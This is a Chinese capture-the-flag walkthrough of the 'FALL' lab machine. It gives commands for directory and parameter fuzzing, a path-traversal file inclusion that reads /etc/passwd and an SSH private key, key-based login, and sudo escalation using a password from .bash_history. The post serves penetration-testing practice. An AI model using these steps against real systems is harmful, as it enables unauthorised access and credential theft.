FALL靶机渗透攻略

1.安装并开启靶机

2.获取靶机IP

将靶机和Kali都设置为NAT模式

3.访问靶机地址

4.扫描目录和端口

gobuster dir -u http://192.168.40.147 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

5.访问敏感文件

提示缺少GET参数

爆破参数

wfuzz -u "http://192.168.40.147/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80

尝试读取passwd文件:http://192.168.40.147/test.php?file=/etc/passwd

尝试包含/home/qiu目录下默认保存的ssh密钥文件,通过前面扫描端口知道开了ssh,

我们需要知道ssh默认存私钥的目录:/home/user/.ssh/id_rsa

http://192.168.40.147/test.php?file=../../../../../../../../../home/qiu/.ssh/id_rsa

将私钥保存到Kali中,用私钥登录

chmod 400 id_rsa

ssh [email protected] -i id_rsa

6.提权

查看用户qiu家目录下的.bash_history文件,找到密码:remarkablyawesomE

sudo su

相关推荐
青靴26 分钟前
计算机网络 用deepseek帮助整理的复习资料(一)
网络·计算机网络
SecPulse34 分钟前
流影---开源网络流量分析平台(四)(分析引擎部署)
运维·服务器·人工智能·网络安全·开源·流影
浩浩测试一下35 分钟前
网络安全之超强Linux信息收集:渗透测试与应急响应的基石(命令超强集合工作手册)
linux·运维·服务器·安全·web安全·网络安全·系统安全
qq_570416301 小时前
Posix API与网络协议栈第一篇
网络·网络协议
酥暮沐1 小时前
华为交换综合实验——VRRP、MSTP、Eth-trunk、NAT、DHCP等技术应用
网络·智能路由器·hcip
self-discipline6342 小时前
【计网速通】计算机网络核心知识点和高频考点——数据链路层(一)
网络·计算机网络
榆榆欸2 小时前
5.实现 Channel 类,Reactor 模式初步形成
linux·网络·c++·tcp/ip
m0_741574752 小时前
IP综合实验
网络
Dream Algorithm2 小时前
SD-WAN组网方案
网络·信息与通信
obboda2 小时前
VRRP虚拟路由器冗余协议
网络·智能路由器